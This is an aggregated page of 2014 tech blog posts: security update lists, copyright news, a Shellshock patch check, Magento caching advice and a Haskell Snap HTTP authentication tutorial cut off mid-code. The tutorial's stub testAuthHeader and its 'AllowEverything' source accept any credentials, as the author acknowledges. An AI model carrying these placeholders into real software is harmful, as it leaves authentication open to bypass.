LWN.net: Tuesday’s security updates

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

CentOS has updated automake (C5: code execution), bash (C5: command execution), bash (C5: two vulnerabilities), bind97 (C5: denial of service), conga (C5: multiple vulnerabilities), krb5 (C5: multiple vulnerabilities), nss (C5: signature forgery), nss, nspr (C5: multiple vulnerabilities), php (C7; C6; C5: multiple vulnerabilities), and xerces-j2 (C7; C6: unspecified vulnerability).

Fedora has updated kernel (F19: multiple vulnerabilities).

Oracle has updated php (OL7; OL6: multiple vulnerabilities) and xerces-j2 (OL7; OL6: unspecified vulnerability).

Red Hat has updated MRG Realtime (RHE MRG: multiple vulnerabilities), php (RHEL7; RHEL5&6: multiple vulnerabilities), and xerces-j2 (RHEL6&7: unspecified vulnerability).

Scientific Linux has updated xerces-j2 (SL6: unspecified vulnerability).

Slackware has updated bash (command execution).

SUSE has updated bash (SLE12; SUSE Manager: multiple vulnerabilities), bash (SLE12: command execution), and mozilla-nss (SLES11 SP1, SLES10 SP3: signature forgery).

Ubuntu has updated libvncserver (14.04, 12.04: multiple vulnerabilities).

TorrentFreak: BitTorrent Wants to Become RIAA Certified Music Service

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Last Friday Radiohead frontman Thom Yorke released his new solo album via BitTorrent. A few tracks were made available for free, but those who want the full album are charged $6.

The new experiment is part of BitTorrent Inc’s bundles project, which allows artists to easily share their work with fans. While many artists tested the waters before Yorke, he is the first to ask for money directly from consumers.

“If it works well it could be an effective way of handing some control of Internet commerce back to people who are creating the work. Enabling those people who make either music, video or any other kind of digital content to sell it themselves. Bypassing the self elected gate-keepers,” commented Thom Yorke on his decision to join.

Fast forward a few days and the album release has turned out to be a great success. At the time of writing the number of downloads surpassed 500,000, and at the current rate this will have doubled before the end of the week.

These numbers are for both the free sample and the full album, which are both being counted by BitTorrent. Thom Yorke doesn’t want the sales figures to become public, but judging from the number of people sharing the torrent, the figure lies well above one hundred thousand.

“When the Bundle is downloaded using one of our clients, it pings back with a torrent added event which is how these are being counted. Thom Yorke has asked that sales figures remain undisclosed, which is his discretion,” BitTorrent spokesman Christian Averill told TorrentFreak.


Now that BitTorrent Inc. has become a paid music service, a whole new world opens up. Will there soon be a BitTorrent release at the top of the charts for example? We asked BitTorrent whether they are considering becoming an RIAA-certified seller, and the company’s answer was an unequivocal yes.

“Our vision is absolutely that Bundles will count toward all the usual industry accolades and charts. Again, it will be up to the publisher of the specific Bundle. But the numbers certainly merit the recognition,” Averill says.

If that happens, BitTorrent sales will be eligible for RIAA’s gold and platinum awards as well as other charts.

While some music industry insiders may need some time to adjust to the idea of BitTorrent (Inc) as an authorized music service, the RIAA itself doesn’t see any reason why the company can’t apply.

“Music sales … on digital music services that are authorized by and reported to the record labels, whether paid for by the consumer through a subscription or free to the consumer through ad-supported services, are accepted for RIAA certifications,” RIAA’s Liz Kennedy tells TorrentFreak.

Becoming RIAA-certified doesn’t happen overnight though. BitTorrent would first have to request the certification and a full audit is then required to receive an Authorized service stamp and a possible listing on whymusicmatters.com.

“Whymusicmatters.com, a joint initiative of the RIAA and Music Biz, lists the leading authorized music services in the United States,” Kennedy explains.

For BitTorrent this would be a great achievement. The company has had to withstand a fair amount of criticism from copyright holders in recent years, and recognition as an authorized music service will surely silence some of it.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

LWN.net: Interview with openSUSE chairman Richard Brown (./themukt)

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Swapnil Bhartiya interviews Richard Brown, the new openSUSE chairman of the board. “The Chairman is appointed by SUSE, and by and large, my role is to be an active Board member, with the same roles and responsibilities as my colleagues on the Board. In addition I have a few additional responsibilities within SUSE, such as being a central point of contact for issues related to openSUSE, and communicating and representing the community’s interests and activities within the company. I suppose it also means something more to the outside world, or else we wouldn’t be having this interview.”

LWN.net: Debian may drop kFreeBSD from the Jessie release

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

The latest Debian “Bits from the release team” posting has a sharply worded warning to the kFreeBSD developers: their work may not be a part of the Jessie release. “We therefore advise the kFreeBSD porters that the port is in danger of being dropped from Jessie, and invite any porters who are able to commit to working on the port in the long term to make themselves known *now*. The factor that gives us greatest concern is the human resources available to the port.”

Beyond Bandwidth: “Not” Neutrality?

This post was syndicated from: Beyond Bandwidth and was written by: Mark Taylor. Original post: at Beyond Bandwidth

In early May, my Internet Middleman post described how a tiny number of very large broadband network operators, mostly in the United States, are using their market power to try to extract arbitrary access charges, and in so doing, are degrading the service they sold to their paying broadband customers. They achieve this degradation by…

The post “Not” Neutrality? appeared first on Beyond Bandwidth.

___: Trolling on The Cypherpunks Mailing List cpunks.org

This post was syndicated from: ___ and was written by: j. Original post: at ___

After leaving Fyodor’s FD, I am trolling on The Cypherpunks Mailing List, https://cpunks.org.

Not a very bad place. For reasons unknown, Google doesn’t index it anymore.

Raspberry Pi: Picademy Cymru

This post was syndicated from: Raspberry Pi and was written by: Carrie Anne Philbin. Original post: at Raspberry Pi

Road trip.

These are the two words that Clive, our Director of Education, says to me on a regular basis. In fact, for some time now he has promised me a road trip to Pencoed in Wales to visit the factory where our Raspberry Pis are manufactured in the UK. Not just any road trip, but one that involves an ice cream van serving raspberry ripple ice creams (avec flake) whilst motoring across the country to Sonic Pi melodies, carrying the entire Foundation crew. You would be forgiven for thinking that these are just the mere ravings of a crazy ex-teacher. But you’d be wrong.

The dream machine

I’m pleased to be able to announce that this dream is to become a reality! Albeit minus the ice cream van. For one time only, we are taking Picademy, our free CPD training programme for teachers, on the road to Wales this coming November, hosted at the Sony UK Technology Centre in Pencoed, South Wales. We have 24 places on Picademy Cymru, taking place on 19th & 20th November, for practising classroom teachers in Wales. If you fit this description then please fill out our application form here or via our Picademy page. We are looking for fun, experimental, not-afraid-to-have-a-go Welsh teachers willing to share their experiences and practices with others. Primary and secondary teachers from any subject specialism are welcome – you don’t need any computing experience, just enthusiasm and a desire to learn.


A few months ago, Dr Tom Crick, Senior Lecturer in Computing Science (and Director of Undergraduate Studies) in the Department of Computing & Information Systems at Cardiff Metropolitan University and Chair of Computing at School Wales got in touch to encourage us to run a Picademy in Wales, offering the support and encouragement we needed in order to make it happen. He says:

This is perfect timing for the first Picademy Cymru and a great opportunity for teachers, even though we still have significant uncertainty around reform of the ICT curriculum in Wales. Nevertheless, there are hundreds of teachers across Wales who have been working hard, particularly at a grassroots level with Computing At School and Technocamps, to embed more computing, programming and computational thinking skills into the existing ICT curriculum, as well as preparing for the new computer science qualifications. This will be a fantastic event and I look forward to helping out!

Join us for a tour of the factory, hands-on Raspberry Pi workshops, cross-curricular resource generation, and Welsh cakes. (If Eben and Liz don’t eat all the Welsh cakes before we get our hands on them. It’s been known to happen before.)

Велоеволюция: Upcoming ride with Chepelare Bike&Hike and ВЕЛО Отчаяни съпруги – Chepelare

This post was syndicated from: Велоеволюция and was written by: hap4oteka. Original post: at Велоеволюция

Next weekend (3-5.10.2014) you can enjoy the Rhodope autumn together with the Chepelare bike enthusiasts from Chepelare Bike&Hike and ВЕЛО Отчаяни съпруги – Chepelare. The bike tour they have organised around the Green Heart of Bulgaria, the Municipality of Chepelare, starts on Friday, 3 October, from the Pashaliytsa hut above Hvoyna. The route follows two of the ridges of the central Rhodopes, along the ancient Roman roads (eastern and central) on the crests of the Radyuva Planina and Chernatitsa ridges. Saturday night is spent at the Mechi Chal chalet on Mechi Chal peak above Chepelare, and on Sunday the tour finishes back in Hvoyna. The hosts have arranged transport for the participants’ luggage, as well as accommodation and meals.
Those wishing to take part must register in advance, by 30 September, using the registration form and following the parameters described there.
Registration after the deadline will be possible only if there are still free places for accommodation.
More information and details: https://www.facebook.com/events/830808300286277/

TorrentFreak: Labels Win Grooveshark Copyright Infringement Case

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Beleaguered music service Grooveshark is facing its biggest threat yet after a long-running case with the major labels of the RIAA came to a close last evening.

In a ruling by United States District Judge Thomas P. Griesa in the United States District Court in Manhattan, Grooveshark parent company Escape Media and two of the company’s top executives were found liable for infringing the rights of the labels on a grand scale.

The summary judgment is not a pretty read. It summarizes Grooveshark’s history and how the service set out with licensing ambitions in mind, but built its catalog by infringing the labels’ rights in the hope of reaching deals later on.

The initial problem was obtaining content to offer to users. The company solved the issue by getting employees to “seed” music to other users via its own P2P sharing software known as Sharkbyte. A 2007 email from co-founder Josh Greenberg to employees reads:

Please share as much music as possible from outside the office, and leave your computers on whenever you can. This initial content is what will help to get our network started—it’s very important that we all help out! If you have available hard drive space on your computer, I strongly encourage you to fill it with any music you can find. Download as many MP3’s as possible, and add them to the folders you’re sharing on Grooveshark. Some of us are setting up special “seed points” to house tens or even hundreds of thousands of files, but we can’t do this alone… There is no reason why ANYONE in the company should not be able to do this, and I expect everyone to have this done by Monday… IF I DON’T HAVE AN EMAIL FROM YOU IN MY INBOX BY MONDAY, YOU’RE ON MY OFFICIAL SHIT LIST.

In 2007, music obtained via Sharkbyte and other means was used to populate Grooveshark’s central music storage library. Internal company emails showed Greenberg, fellow co-founder Tarantino and Escape’s senior programmer encouraging employees to bring in and download music so it could be uploaded to the company’s servers.

By 2008 the Grooveshark service carried more than a million tracks, including thousands uploaded by Greenberg, Tarantino and other employees. That service grew by another million tracks and eventually into the streaming service available today.

A year later the service was beginning to receive DMCA takedown notices but according to the decision handed down yesterday, the company had a solution to keep that content online.

“Escape’s senior officers searched for infringing songs that had [been] removed in response to DMCA takedown notices and re-uploaded infringing copies of those songs to Grooveshark to ensure that the music catalog remained complete,” the decision reads.

Furthermore, records show that thousands of the DMCA notices sent by the labels were forwarded internally to employees, including Greenberg and Tarantino, for the music they had personally uploaded. The fact that employees were uploading content became known to the labels following discovery in another case currently before the courts.

While the Court accepted that Escape and its employees uploaded thousands of tracks, the huge numbers claimed by the labels were rejected. In total the Court found that the defendants are liable for uploading ‘just’ 5,977 copyright works.

And, of course, there is the not insignificant number of tracks the company streamed to its users over the course of its operations. Escape’s own records show that it “streamed or publicly performed” copies of plaintiffs’ copyrighted sound recordings at least 36 million times.

“Each time Escape streamed one of plaintiffs’ song recordings, it directly infringed upon plaintiffs’ exclusive performance rights,” the decision reads.

As a result of Greenberg and Tarantino instructing company employees to upload copyright-protected music to Grooveshark, the Court granted the labels’ motion for summary judgment on their claim for direct copyright infringement.

On the secondary infringement front the Court ruled that Escape Media is liable for the direct infringements of the employees it instructed to upload music.

“[The record labels] advance three theories of secondary liability: (1) vicarious copyright infringement, (2) inducement of copyright infringement, and (3) contributory copyright infringement. The court finds for plaintiffs on all three theories of liability,” the judgment reads.

In respect of Escape’s co-founders, Tarantino and Greenberg, the Court found that they are not only “jointly and severally liable for Escape’s direct and secondary copyright infringement” but also liable for direct infringement due to their own personal uploads of infringing content to Grooveshark.

The judgment concludes with an instruction for the parties to submit proposals on the scope of a permanent injunction against Grooveshark within 21 days. Escape Media has already announced its intention to appeal.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: Apple Releases Patches for Shellshock Bug

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Apple has released updates to insulate Mac OS X systems from the dangerous “Shellshock” bug, a pervasive vulnerability that is already being exploited in active attacks.

Patches are available via Software Update, or from the following links for OS X Mavericks, Mountain Lion, and Lion.

After installing the updates, Mac users can check to see whether the flaw has been truly fixed by taking the following steps:

* Open Terminal, which you can find in the Applications folder (under the Utilities subfolder on Mavericks) or via Spotlight search.

* Execute this command:
bash --version

* The version after applying this update will be:

OS X Mavericks:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13)
OS X Mountain Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12)
OS X Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)

Anchor Managed Hosting: Making Magento Shine with Varnish – Part 1

This post was syndicated from: Anchor Managed Hosting and was written by: Michael Davies. Original post: at Anchor Managed Hosting

Developing for the web can be overwhelming – the stack of technologies involved has only grown over the years, whilst customers demand faster and more responsive websites. Performance is often an afterthought, partly because it can be tricky to define. New features are tangible and easily demonstrated, but it can be difficult to make a business case for performance during the development stage. Yet as studies by Akamai, Google and Amazon have shown, the success of e-commerce sites in particular is closely linked to how they perform. Magento is a popular e-commerce framework that offers a wealth of customisation through an extensible design, though this flexibility can easily result in slow, sluggish websites if you aren’t careful. But what does it even mean for a website to be slow or perform well?

What is performance, anyway?

Often when people talk about the performance of websites, they actually mean latency. It’s no good for business if your infrastructure can handle 10,000,000 concurrent users but every page takes 5 minutes to load. The Amazon page speed study in 2007 found that there was “a 1% decrease in sales for every 0.1s increase in response times” – and the standard is only higher these days. When a customer visits your website, there are many factors involved that determine how long it takes for the page to become usable. Some of the delay is due to the time taken by the web server to prepare and send content, which is usually referred to as the server response time. Other delays can be due to slow JavaScript or CSS that block page rendering.

The best way to get started with improving performance is to measure the page load time with an independent tool such as Google PageSpeed Insights, webpagetest.org or Pingdom FPT. These give you a useful starting point and a good overview of where the most time is being taken. One of the most popular metrics used for analysing server-side performance is the “Time To First Byte” (TTFB), which as a concept has been measured for a long time. It’s important to note that this is not perfect since it can be confounded by internet latency and other such factors outside of your control. It can also be trivially artificially lowered whilst not impacting the total load time of the page.


If your Time To First Byte is bad, you might see this message on PageSpeed Insights
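If you want a quick, scriptable sanity check of server response time alongside those online tools, even a few lines of code will do. The sketch below is purely illustrative and not from the original article: it times a whole HTTP GET (so it measures more than just the TTFB), uses Haskell’s http-client package, and points at a placeholder URL that you would replace with one of your own pages.

-- Crude response-time check: time a full GET of one page.
-- The URL is a placeholder; run it against a category or product page to compare.
import           Network.HTTP.Client (defaultManagerSettings, httpLbs, newManager,
                                      parseRequest, responseStatus)
import           Data.Time.Clock     (diffUTCTime, getCurrentTime)

main :: IO ()
main = do
    manager  <- newManager defaultManagerSettings
    request  <- parseRequest "http://shop.example.com/some-category.html"
    start    <- getCurrentTime
    response <- httpLbs request manager
    end      <- getCurrentTime
    putStrLn $ "Status:  " ++ show (responseStatus response)
    putStrLn $ "Elapsed: " ++ show (diffUTCTime end start)

Run it a few times and against several page types, since a single measurement tells you very little.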

When it comes to Magento and page performance, it’s worth recognising that every page is different and even though you might optimise the load time of a product page, it doesn’t necessarily mean other pages will be any faster. It is worth running multiple pages through the online testing tools above, but generally there are five types of pages you want to benchmark to get an overview of how your site performs:

  • Homepage
  • Category
  • Product
  • Search Result
  • CMS, such as Help or FAQ

It is extremely common to find the homepage is snappy but the rest of the site is slow – the homepage tends to be where most of the effort is put in during development. Category pages are often slow because of the number of products they include, and thus the volume of database queries. Be careful of the temptation to have, for example, “show all products” since that is especially expensive for the server.

 

C.R.E.A.M. – Cache Rules Everything Around Magento

In an attempt to alleviate the performance problems incurred by Magento’s complex EAV design, Varien implemented several caches built on the Zend Framework. Magento supports several different caching back-ends to be specified in the local.xml configuration. Using a cache to improve performance is not a new concept by any means. Instead of doing difficult work over and over, you simply do it once and save the result. A typical large Magento deployment might have caching at all the layers illustrated in the “Example Caching Hierarchy” diagram from the original post. When a client makes a request from the server, you can easily visualise the various systems it passes through, from the browser’s cache all the way to the server that eventually processes it. The general rule of thumb is that caching improves performance, and caches closer to the client reduce latency further. Despite some advanced techniques it is basically impossible to rely solely on client-side caching – at some point with dynamic sites the server must become involved.

But involving the server means a massive increase in latency. Modern high performance web servers such as nginx are rarely the bottleneck when it comes to an e-commerce site though. The slowdown comes from generating dynamic pages using a language like PHP. If a request has to hit PHP at all, this adds a lot of overhead. Parsing all the code involved in a Magento store requires orders of magnitude more CPU than serving content from a cache. Even communicating over FastCGI causes some additional latency. Opcode caches such as APC or Zend help, but only so much – they are still far too slow to use with a site that will get more than a few hundred requests per second. Beyond these internal PHP caches, there are many caches maintained by Magento itself. Yet these still suffer from the same problem – they don’t scale, because they still involve PHP.

 

Varnish is an “HTTP Accelerator” – it sits in front of your web application and serves content from its cache where possible. Its main appeal is that it is fast. Really fast. However not every page can, or should, be cached. The trouble with “Full Page Caching” in the truest sense of the term is that it is useless if you are personalising content per session or per user. Elements such as the shopping cart should never be cached – otherwise you risk confusing users by showing them someone else’s cart. Likewise, if a user can create an account and log in, it is important not to cache that personalised page and display it for everybody. Fortunately, there is a solution which neatly utilises the flexibility and features of both Magento and Varnish.

Magento pages are constructed out of ‘blocks’, such as the header, footer, menus, cart, lists of products and so on. Although certain content such as shopping carts or personalised greetings should never be cached, the list of products is typically going to be the same regardless of user. Turpentine is a free and open-source plugin for Magento which integrates with Varnish’s “Edge Side Includes” and allows elements of pages to be cached on the block level. This can dramatically reduce server load and also improve performance, since the most expensive parts of page rendering (the list of products, menus) are cached.

Turpentine and Varnish are certainly advanced and effective tools for taking the performance of Magento to the next level, but the decision to use them should not be taken lightly. Every Magento store is different, and depending on the plugins in use you will need to test and confirm that you have excluded the necessary blocks from the block-level caching. ESI alone can only help so much, as there can still be a delay when rendering dynamic content such as shopping carts. Ideally these dynamic elements should be loaded with AJAX so that the page can be rendered as quickly as possible.

In the following posts I will give an overview of how Varnish works, and how Turpentine integrates it with Magento. I will also demonstrate with benchmarks why this sort of caching is necessary to make Magento scale and stay fast under load.

The post Making Magento Shine with Varnish – Part 1 appeared first on Anchor Managed Hosting.

SANS Internet Storm Center, InfoCON: yellow: ISC StormCast for Tuesday, September 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4169, (Tue, Sep 30th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: yellow and was written by: SANS Internet Storm Center, InfoCON: yellow. Original post: at SANS Internet Storm Center, InfoCON: yellow

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Anchor Managed Hosting: HTTP Basic Authentication in Snap Framework

This post was syndicated from: Anchor Managed Hosting and was written by: Geoffrey Roberts. Original post: at Anchor Managed Hosting

Hi, I’m Geoffrey Roberts, one of the web developers at Anchor. I’d like to discuss something I’ve built in Haskell, and hopefully give you some ideas for other things you can do in terms of web development with the language.

I’ve been working on some web frontends in Snap Framework lately, and came to a point where I needed to know who was accessing the frontend, and whether they were allowed to use it. Seeing as the application needed to support both human-visible and RESTful interfaces, I realised that I couldn’t really use any off-the-shelf authentication methods.

While Snap does provide you with something out of the box to do authentication, it’s intended for human-usable interfaces only, since it’s reliant on cookie-identified sessions. Also, most of our other APIs already use some form of HTTP authentication, so it makes sense to go with an interface that people are already used to working with.

However, Snap doesn’t come with anything out of the box to handle HTTP authentication in the way it does for session-based authentication. We needed to write it ourselves.

Snaplets

Snap has a particular way of defining plugins or modules that allow certain bits of functionality to be abstracted away from the main webapp; the Snap team refers to their modular approach as Snaplets. However, given that the Haskell web space isn’t particularly well-developed, the Snap team only acknowledges the existence of about a dozen Snaplets on their website.

But here’s the rub; we don’t actually need to write a whole snaplet just to do HTTP authentication. It’s enough to write a few intermediary functions and define a couple of data types.

Data types

First, we’re going to define a data type that covers the kind of authentication that we are going to use. Let’s call it AuthHeader.

import Data.ByteString (ByteString)
data AuthHeader = BasicAuth ByteString deriving (Show, Eq)

For the time being, we’ll only support Basic HTTP authentication, but this could later be extended to support Digest and custom token-based headers too.
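As a purely hypothetical illustration of that extension point (none of these extra constructors are used anywhere else in this post), the sum type could simply grow one constructor per scheme:

-- Hypothetical extension of AuthHeader; only BasicAuth is handled in this post,
-- the other constructors are placeholders for future schemes.
import Data.ByteString (ByteString)

data AuthHeader = BasicAuth ByteString   -- payload of a "Basic <base64>" header
                | DigestAuth ByteString  -- raw parameters of a "Digest ..." header
                | TokenAuth ByteString   -- e.g. a custom "Bearer <token>" scheme
                deriving (Show, Eq)

parseAuthorizationHeader, which we define below, would then need a matching case for each new constructor.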

Writing the intermediary

The intermediary function that we’re going to write starts out like this:

withAuth :: Handler App App () -> Handler App App ()

As you can see, the type signature takes in a single action of type Handler App App (), and returns something of type Handler App App (). Essentially, the argument we’re taking is the handler that gets called when the HTTP authentication is successful. This means, that when we call our other handlers, they’d look something like this:

exampleHandler :: Handler App App ()
exampleHandler = withAuth $ do
    writeBS "Hello authenticated user"

As you can see, the behaviour of the handler is nicely wrapped within withAuth.
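To make that a little more concrete, here is a minimal sketch of how the wrapped handler might be wired into Snap’s routing table. The "/hello" path is invented for illustration, and routes is the same list that is eventually handed to addRoutes in Site.hs (OverloadedStrings is assumed for the ByteString literal):

{-# LANGUAGE OverloadedStrings #-}
-- Hypothetical route table entry: requests to /hello must pass HTTP auth,
-- because exampleHandler is wrapped in withAuth.
routes :: [(ByteString, Handler App App ())]
routes = [ ("/hello", exampleHandler) ]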

Getting the Authorization header

Anyway, the rest of the intermediary looks a bit like this:

withAuth successful = do
    rq <- getRequest
    let mh = getHeader "Authorization" rq
    let h = parseAuthorizationHeader mh
    uok <- liftIO $ testAuthHeader h
    if uok
        then successful
        else case h of
            Nothing -> throwChallenge
            Just _  -> throwDenied

Firstly, it gets the current Request from the Snap monad, which Handler implements. We extract the Authorization header from it – note the use of let, because getHeader doesn’t operate within any of Handler‘s monads.

We then call to an external function called parseAuthorizationHeader to turn the value that could be the Authorization header into a value of type Maybe AuthHeader. We say it could be, because we can’t actually assume that the Request actually contains an Authorization header. To this end, getHeader actually returns a value of type Maybe ByteString, to allow for the possibility that the Request doesn’t have one.

parseAuthorizationHeader looks a bit like this:

parseAuthorizationHeader :: Maybe ByteString -> Maybe AuthHeader
parseAuthorizationHeader bs =
    case bs of
        Nothing -> Nothing
        Just x ->
            case (S.split ' ' x) of
                ("Basic" : y : _) ->
                    if S.length y > 0 then Just $ BasicAuth y else Nothing
                _ -> Nothing

Note the use of S as prefixes for ByteString manipulation functions. Let’s make sure we add import qualified Data.ByteString.Char8 as S up the top of our module so we can support the split and length functions, and so we don’t introduce unnecessary ambiguity.
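A quick way to convince yourself the parser behaves as intended is to poke at it from GHCi or a throwaway main. The inputs below are made up for illustration ("dXNlcjpwYXNz" is just "user:pass" base64-encoded) and OverloadedStrings is assumed for the ByteString literals; the expected results are in the comments.

{-# LANGUAGE OverloadedStrings #-}
-- Throwaway sanity checks for parseAuthorizationHeader.
main :: IO ()
main = do
    print $ parseAuthorizationHeader (Just "Basic dXNlcjpwYXNz") -- Just (BasicAuth "dXNlcjpwYXNz")
    print $ parseAuthorizationHeader (Just "Bearer abc123")      -- Nothing (unsupported scheme)
    print $ parseAuthorizationHeader (Just "Basic ")             -- Nothing (empty credentials)
    print $ parseAuthorizationHeader Nothing                     -- Nothing (no header at all)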

Testing the Authorization header

Going back to our intermediary function:

uok <- liftIO $ testAuthHeader h

This calls out to an action called testAuthHeader, which runs in the IO monad. We can use the IO monad within Handler, but it’s buried down there in the stack a bit, which means we need to use liftIO to get to it.

testAuthHeader, at its simplest, looks a bit like this:

testAuthHeader :: Maybe AuthHeader -> IO Bool
testAuthHeader Nothing = return False
testAuthHeader (Just h) = return True

As you can see, it expects any kind of AuthHeader value with some content in it. It’s not very secure, and it doesn’t check the provenance of this header, but at least it checks.

Since the function is of type IO Bool, we need to wrap the pure Bool value back up into a monadic one, which is what return does. The reason behind working in the IO monad is that it gives us breathing space for calling out to extend this function later on, so we can check the auth header properly against external services.
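As a purely illustrative stepping stone between “accept anything” and the external API lookup we build later in this post, you could accept exactly one hard-coded credential pair by comparing against the expected base64 value. The credentials here are made up, and OverloadedStrings is assumed:

{-# LANGUAGE OverloadedStrings #-}
-- Hypothetical variant: only accept the made-up pair user:pass,
-- whose Basic payload is the base64 string "dXNlcjpwYXNz".
testAuthHeader :: Maybe AuthHeader -> IO Bool
testAuthHeader Nothing              = return False
testAuthHeader (Just (BasicAuth b)) = return (b == "dXNlcjpwYXNz")

Comparing base64 strings like this is obviously crude; the point is only that the IO return type leaves room to swap in a real lookup without touching withAuth.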

Finally, we need to do something with our uok variable – this will tell us whether we are allowed to run successful.

if uok
    then successful
    else case h of
        Nothing -> throwChallenge
        Just _  -> throwDenied

HTTP status code handlers

We have two more actions to implement, throwChallenge and throwDenied, and both of these are Handlers. If no Authorization header was present at all, we run throwChallenge. If there was an Authorization header present, but it wasn’t valid, we run throwDenied. Both actions return a response with a particular HTTP status code, and in one case, set a special HTTP header.

throwChallenge :: Handler App App ()
throwChallenge = do
    modifyResponse $ (setResponseStatus 401 "Unauthorized") . (setHeader "WWW-Authenticate" "Basic realm=my-authentication")
    writeBS ""

throwDenied :: Handler App App ()
throwDenied = do
    modifyResponse $ setResponseStatus 403 "Access Denied"
    writeBS "Access Denied"

Note the way that setResponseStatus and setHeader are wrapped in modifyResponse. This is because modifyResponse modifies the current Response in the Snap monad, and setResponseStatus and setHeader are both pure functions that modify a Response that is passed to them as an argument. By using function composition, you can chain together Response-modifying functions and pass them to modifyResponse in one go.

Once this is done, just use writeBS to write output as a ByteString, and that’s it. That really is all you need to be able to get started with HTTP Authentication.

More than the basics, part 1: Decoding Basic Authorization headers

Once you’ve implemented the bare minimum, however, there’ll be other things you’ll want to do with it. Let’s start with the most obvious enhancement – decoding Basic Authorization headers.

If you want to extract a username and password from your Basic authorisation header, you’ll want to write something that is able to decode it. Since Basic auth headers are base64 encoded, let’s install the base64-bytestring package, and import it:

import qualified Data.ByteString.Base64 as BS64

Here’s an example of how this could work.

decodeAuthHeader :: AuthHeader -> Maybe (ByteString, ByteString)
decodeAuthHeader (BasicAuth x) =
    case S.split ':' $ BS64.decodeLenient x of
        (u:p:_) -> Just (u, p)
        _ -> Nothing

It’s more rigorous to use Data.ByteString.Base64.decode instead of decodeLenient, but this is the simplest way to show how it will work.

Once you’ve got a decoded ByteString, you can split on the colon character, and then see if the resulting list has at least two elements. If it does, return the first two in a tuple, and wrap it in Just so we know that we have something good. For everything else, we just return a Nothing, because after all, we have nothing!
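Continuing with the same made-up credentials as before, the decoder behaves like this (expected results in the comments; "bm9jb2xvbg==" decodes to "nocolon", which has no colon at all, and OverloadedStrings is again assumed):

{-# LANGUAGE OverloadedStrings #-}
-- Throwaway checks for decodeAuthHeader.
main :: IO ()
main = do
    print $ decodeAuthHeader (BasicAuth "dXNlcjpwYXNz") -- Just ("user","pass")
    print $ decodeAuthHeader (BasicAuth "bm9jb2xvbg==") -- Nothing

One thing to keep in mind: because the pattern only takes the first two fields, a password that itself contains a colon would be silently truncated; rejoining the tail with S.intercalate ":" would be the more careful option.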

Also, note that when you’re dealing with external services, you might not even need to decode the Basic Authorization header. We’ll show you why next.

More than the basics, part 2: Authenticating against external sources

At some point you’re going to want to define a data source to call out to, and configure it at launch time somehow. Now we’re going to have to delve into Snap’s more advanced functionality!

Note: this method doesn’t really delve into Snaplet construction, but it does shed a little light on how you might be able to satisfy this one particular case.

Configuring your application to use external services

The easiest way to configure your application is to add a new parameter to your App, and populate it accordingly at launch time. You can then access the contents of this parameter within your Handlers.

First, define a new algebraic data type that will give you the information you need to connect to your external service. Let’s call it BasicAuthDataSource.

data BasicAuthDataSource = AllowEverything
                         | MyAuthAPI {
                               myAuthEndpointURL :: String,
                               myAuthEndpointMethod :: String
                           }

This type defines two data sources. One is a dummy source that just allows every request that gets handed to it, and the other is an external service that is defined by a URL and HTTP method.

Now, we need to create a value to store state for Snap. Let’s call this one BasicAuthManager, and define a function called authDataSource, so it’s easy to pull the BasicAuthDataSource out when we need it.

data BasicAuthManager =
    BasicAuthManager {
        authDataSource :: BasicAuthDataSource
    }

Now, you need to add the BasicAuthManager to your App. Go to your Application.hs file, and look for the definition of App. Add a new parameter for your BasicAuthManager right at the end:

data App = App
    { _heist :: Snaplet (Heist App)
    , _httpauth :: BasicAuthManager
    }

Finally, go to your Site.hs file, and note how your App is composed right at the end of the function. One example of how you might define your BasicAuthManager might be as follows:

app :: SnapletInit App App
app = makeSnaplet "app" "An snaplet example application." Nothing $ do
    h <- nestSnaplet "" heist $ heistInit "templates"
    let authCfg = BasicAuthManager $ MyAuthAPI "https://api.example.com/get_user" "get"
    addRoutes routes
    return $ App h authCfg

Acquiring the BasicAuthDataSource within our handler

Now that we’ve added our BasicAuthManager to our App, let’s make use of it from our withAuth wrapper.

Remember our testAuthHeader function? Let’s rewrite that to make use of something that calls our external API.

testAuthHeader :: BasicAuthDataSource -> Maybe AuthHeader -> IO Bool
testAuthHeader _ Nothing = return False
testAuthHeader s (Just h) = do
    u <- getUser s h
    case u of
        Nothing -> return False
        Just _  -> return True

Note that we’re using a BasicAuthDataSource value, and we’re calling out to a new function getUser to check if we have a valid user. But how do we get our BasicAuthDataSource?

Let’s go back to withAuth, and modify it to pull the _httpauth out of our App‘s state.

withAuth :: Handler App App () -> Handler App App ()
withAuth successful = do
    rq <- getRequest
    authManager <- gets _httpauth
    let mh = getHeader "Authorization" rq
    let h = parseAuthorizationHeader mh
    uok <- liftIO $ testAuthHeader (authDataSource authManager) h
    if uok
        then successful
        else case h of
            Nothing -> throwChallenge
            Just _  -> throwDenied

Note the appearance of gets _httpauth – this is the bit that extracts the persistent BasicAuthManager from the App. From this point, we can simply call authDataSource on it to pull out the BasicAuthDataSource, and add that to our call to testAuthHeader.

Getting a user

The final piece of the puzzle is getUser, and everything that hangs off it. Let’s start by defining that for all available BasicAuthDataSource types, and a data type called AuthUser to store the details of authenticated users.

data AuthUser = AuthUser {
    authUserIdentity :: ByteString,
    authUserDetails :: HashMap ByteString ByteString
} deriving (Show, Eq)

getUser :: BasicAuthDataSource -> AuthHeader -> IO (Maybe AuthUser)
getUser AllowEverything (BasicAuth _) = do
    return $ Just $ AuthUser "basicAuthAllowed" Data.HashMap.empty
getUser a@(MyAuthAPI _ _) hdr = myAuthAPIGetUser a hdr

As you can see, using AllowEverything just assumes that any AuthHeader is valid, and therefore returns an arbitrary Just AuthUser. For MyAuthAPI, we have to define a function called myAuthAPIGetUser.

myAuthAPIGetUser :: BasicAuthDataSource -> AuthHeader -> IO (Maybe AuthUser)
